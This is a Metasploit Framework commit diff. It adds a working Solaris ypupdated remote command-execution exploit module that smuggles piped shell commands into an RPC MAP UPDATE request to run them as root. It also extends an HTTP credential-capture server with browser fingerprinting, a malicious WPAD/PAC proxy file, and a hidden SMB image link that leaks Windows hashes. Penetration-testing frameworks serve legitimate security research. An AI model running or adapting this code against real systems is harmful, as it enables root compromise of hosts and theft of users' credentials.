Adding I)ruids's yp exploit. Fixing a streamserver bug thats been causing problems for a while. Updating the HTTP capture module to do better fingerprinting
git-svn-id: file:///home/svn/framework3/trunk@5477 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
094333edce
commit
57131f98c3
|
@ -175,6 +175,10 @@ protected
|
||||||
rlog(ExceptionCallStack)
|
rlog(ExceptionCallStack)
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
|
|
||||||
|
rescue ::Rex::StreamClosedError => e
|
||||||
|
# Remove the closed stream from the list
|
||||||
|
clients.delete(e.stream)
|
||||||
rescue
|
rescue
|
||||||
elog("Error in stream server client monitor: #{$!}")
|
elog("Error in stream server client monitor: #{$!}")
|
||||||
rlog(ExceptionCallStack)
|
rlog(ExceptionCallStack)
|
||||||
|
|
|
@ -71,7 +71,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
|
|
||||||
def on_client_data(cli)
|
def on_client_data(cli)
|
||||||
begin
|
begin
|
||||||
case cli.request.parse(cli.get)
|
data = cli.get_once(-1, 5)
|
||||||
|
case cli.request.parse(data)
|
||||||
|
|
||||||
when Rex::Proto::Http::Packet::ParseCode::Completed
|
when Rex::Proto::Http::Packet::ParseCode::Completed
|
||||||
dispatch_request(cli, cli.request)
|
dispatch_request(cli, cli.request)
|
||||||
|
|
||||||
|
@ -79,23 +81,62 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
when Rex::Proto::Http::Packet::ParseCode::Error
|
when Rex::Proto::Http::Packet::ParseCode::Error
|
||||||
close_client(cli)
|
close_client(cli)
|
||||||
end
|
end
|
||||||
rescue EOFError
|
rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET
|
||||||
if (cli.request.completed?)
|
rescue ::Exception
|
||||||
dispatch_request(cli, cli.request)
|
print_status("Error: #{$!.class} #{$!} #{$!.backtrace}")
|
||||||
|
|
||||||
cli.reset_cli
|
|
||||||
end
|
|
||||||
|
|
||||||
close_client(cli)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
close_client(cli)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def close_client(cli)
|
def close_client(cli)
|
||||||
|
cli.close
|
||||||
end
|
end
|
||||||
|
|
||||||
def dispatch_request(cli, req)
|
def dispatch_request(cli, req)
|
||||||
|
|
||||||
|
os_name = nil
|
||||||
|
os_type = nil
|
||||||
|
os_vers = nil
|
||||||
|
os_arch = 'x86'
|
||||||
|
|
||||||
|
ua_name = nil
|
||||||
|
ua_vers = nil
|
||||||
|
|
||||||
|
ua = req['User-Agent']
|
||||||
|
|
||||||
|
case (ua)
|
||||||
|
when /rv:([\d\.]+)/
|
||||||
|
ua_name = 'FF'
|
||||||
|
ua_vers = $1
|
||||||
|
when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]\.[0-9]+)/:
|
||||||
|
ua_name = 'IE'
|
||||||
|
ua_vers = $1
|
||||||
|
when /Version\/(\d+\.\d+\.\d+).*Safari/
|
||||||
|
ua_name = 'Safari'
|
||||||
|
ua_vers = $1
|
||||||
|
end
|
||||||
|
|
||||||
|
case (ua)
|
||||||
|
when /Windows/
|
||||||
|
os_name = 'Windows'
|
||||||
|
when /Linux/
|
||||||
|
os_name = 'Linux'
|
||||||
|
when /iPhone/
|
||||||
|
os_name = 'iPhone'
|
||||||
|
os_arch = 'armle'
|
||||||
|
when /Mac OS X/
|
||||||
|
os = 'Mac'
|
||||||
|
end
|
||||||
|
|
||||||
|
case (ua)
|
||||||
|
when /PPC/
|
||||||
|
os_arch = 'ppc'
|
||||||
|
end
|
||||||
|
|
||||||
|
os_name ||= 'Unknown'
|
||||||
|
|
||||||
mysrc = Rex::Socket.source_address(cli.peerhost)
|
mysrc = Rex::Socket.source_address(cli.peerhost)
|
||||||
hhead = (req['Host'] || @myhost).split(':', 2)[0]
|
hhead = (req['Host'] || @myhost).split(':', 2)[0]
|
||||||
|
|
||||||
|
@ -114,6 +155,21 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
|
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
if(req.resource =~ /\.eml$/)
|
||||||
|
eml = "To: User\r\nFrom: Support\r\nSubject: Failed to connect\r\n\r\nInternet access has been prohibited by the administrator\r\n"
|
||||||
|
res =
|
||||||
|
"HTTP/1.1 200 OK\r\n" +
|
||||||
|
"Host: #{hhead}\r\n" +
|
||||||
|
"Content-Type: message/rfc822\r\n" +
|
||||||
|
"Content-Length: #{eml.length}\r\n" +
|
||||||
|
"Connection: Close\r\n\r\n#{eml}"
|
||||||
|
print_status("HTTP EML sent to #{cli.peerhost}")
|
||||||
|
cli.put(res)
|
||||||
|
return
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
|
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
|
||||||
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
|
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
|
||||||
res =
|
res =
|
||||||
|
@ -127,7 +183,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}")
|
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers}")
|
||||||
|
|
||||||
|
|
||||||
# The google maps / stocks view on the iPhone
|
# The google maps / stocks view on the iPhone
|
||||||
|
@ -149,9 +205,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
# Background image
|
||||||
# SMB MITM / RELAY
|
|
||||||
|
|
||||||
body_extra = ""
|
body_extra = ""
|
||||||
if(@bgimage)
|
if(@bgimage)
|
||||||
img_ext = @bgimage.split(".")[-1].downcase
|
img_ext = @bgimage.split(".")[-1].downcase
|
||||||
|
@ -192,11 +246,18 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
data = "<html><head><title>Connecting...</title></head><body>#{body_extra}"
|
||||||
|
if(ua_name == "IE")
|
||||||
|
data << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>"
|
||||||
|
end
|
||||||
|
|
||||||
|
data << "</body></html>"
|
||||||
|
|
||||||
data = "<html><head><title>Connecting...</title></head><body>#{body_extra}<img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>"
|
|
||||||
res =
|
res =
|
||||||
"HTTP/1.1 200 OK\r\n" +
|
"HTTP/1.1 200 OK\r\n" +
|
||||||
"Host: #{mysrc}\r\n" +
|
"Host: #{mysrc}\r\n" +
|
||||||
|
"Expires: 0\r\n" +
|
||||||
|
"Cache-Control: must-revalidate\r\n" +
|
||||||
"Content-Type: text/html\r\n" +
|
"Content-Type: text/html\r\n" +
|
||||||
"Content-Length: #{data.length}\r\n" +
|
"Content-Length: #{data.length}\r\n" +
|
||||||
"Connection: Close\r\n\r\n#{data}"
|
"Connection: Close\r\n\r\n#{data}"
|
||||||
|
@ -206,7 +267,5 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,78 @@
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::SunRPC
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Solaris ypupdated Command Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
This exploit targets a weakness in the way the ypupdated RPC
|
||||||
|
application uses the command shell when handling a MAP UPDATE
|
||||||
|
request. Extra commands may be launched through this command
|
||||||
|
shell, which runs as root on the remote host, by passing
|
||||||
|
commands in the format '|<command>'.
|
||||||
|
|
||||||
|
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
|
||||||
|
ypupdated is started with the '-i' command-line option.
|
||||||
|
},
|
||||||
|
'Author' => [ 'I)ruid <druid@caughq.org>' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Version' => '$Revision: 4498 $',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['BID', '1749'],
|
||||||
|
['CVE', '1999-0209'],
|
||||||
|
['OSVDB', '11517'],
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'Platform' => ['unix', 'solaris'],
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 1024,
|
||||||
|
'DisableNops' => true,
|
||||||
|
},
|
||||||
|
'Targets' => [ ['Automatic', { }], ],
|
||||||
|
'DefaultTarget' => 0
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
|
||||||
|
OptInt.new('GID', [false, 'GID to emulate', 0]),
|
||||||
|
OptInt.new('UID', [false, 'UID to emulate', 0])
|
||||||
|
], self.class
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
hostname = datastore['HOSTNAME']
|
||||||
|
program = 100028
|
||||||
|
progver = 1
|
||||||
|
procedure = 1
|
||||||
|
|
||||||
|
print_status 'Sending PortMap request for ypupdated program'
|
||||||
|
pport = sunrpc_create('udp', program, progver)
|
||||||
|
|
||||||
|
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
|
||||||
|
print_status 'Waiting for response...'
|
||||||
|
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
|
||||||
|
command = '|' + payload.encoded
|
||||||
|
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
|
||||||
|
sunrpc_call(procedure, msg)
|
||||||
|
|
||||||
|
sunrpc_destroy
|
||||||
|
|
||||||
|
print_good 'No Errors, appears to have succeeded!'
|
||||||
|
rescue ::Rex::Proto::SunRPC::RPCTimeout
|
||||||
|
print_status 'Warning: ' + $!
|
||||||
|
print_status 'Exploit may or may not have succeeded.'
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue